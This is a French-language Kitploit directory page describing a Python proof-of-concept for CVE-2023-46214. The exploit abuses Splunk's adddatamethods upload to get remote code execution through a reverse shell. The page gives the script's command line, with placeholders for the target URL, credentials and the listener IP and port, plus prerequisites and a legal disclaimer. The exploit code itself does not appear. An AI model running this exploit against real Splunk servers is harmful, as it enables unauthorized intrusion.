Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Splunk-RCE-poc — PoC basé sur Python pour CVE-2023-46214 qui exploite la fonctionnalité adddatamethods de Splunk pour réaliser une exécution de code à distance via un reverse shell. | Kitploit
Outils/GitHubGitHub/nathan31337/splunk-rce-poc
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationRed Teaming
GitHubnathan31337/splunk-rce-poc

Splunk-RCE-poc

PoC basé sur Python pour CVE-2023-46214 qui exploite la fonctionnalité adddatamethods de Splunk pour réaliser une exécution de code à distance via un reverse shell.

Voir le dépôt
11423il y a 2 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Splunk RCE - PoC

Exploit de preuve de concept pour CVE-2023-46214, SVD-2023-1104

poc

Utilisation

L'URL de l'instance Splunk, le nom d'utilisateur, le mot de passe, l'adresse IP du reverse shell et le port sont tous requis comme paramètres de ligne de commande. Par exemple :

root@kitploit:~
$ python3 CVE-2023-46214.py --url <Splunk_URL> --username <Username> --password <Password> --ip <Reverse_Shell_IP> --port <Reverse_Shell_Port>

Prérequis

  • Des identifiants Splunk disposant de la permission de téléversement vers adddatamethods
    • Remarque : un autre vecteur est peut-être possible, c'est simplement celui que j'ai utilisé.
  • Splunk ne fonctionne pas en mode SHC

Analyse

J'ai rédigé un article de blog détaillant la méthodologie utilisée pour découvrir cette vulnérabilité. Si vous rencontrez des problèmes avec le script, cet article peut être utile car il détaille les étapes manuelles d'exploitation.

Analyse de la CVE-2023-46214 + PoC

Avertissement légal

Le script de preuve de concept (PoC) fourni dans ce dépôt sert uniquement à des fins éducatives et de recherche. Son but est de démontrer une vulnérabilité spécifique et d'aider à comprendre les risques de sécurité associés.

Toute utilisation de ce script pour des activités non autorisées, y compris mais sans s'y limiter, l'accès non autorisé à des systèmes, les tests non autorisés ou toute autre forme d'utilisation abusive, est formellement interdite.

Les créateurs et contributeurs de ce dépôt déclinent toute responsabilité en cas d'utilisation inappropriée ou de tout dommage ou préjudice résultant de l'utilisation de ce script. En utilisant ce script, vous consentez à l'utiliser de manière responsable et à vos propres risques.

Télécharger l’outil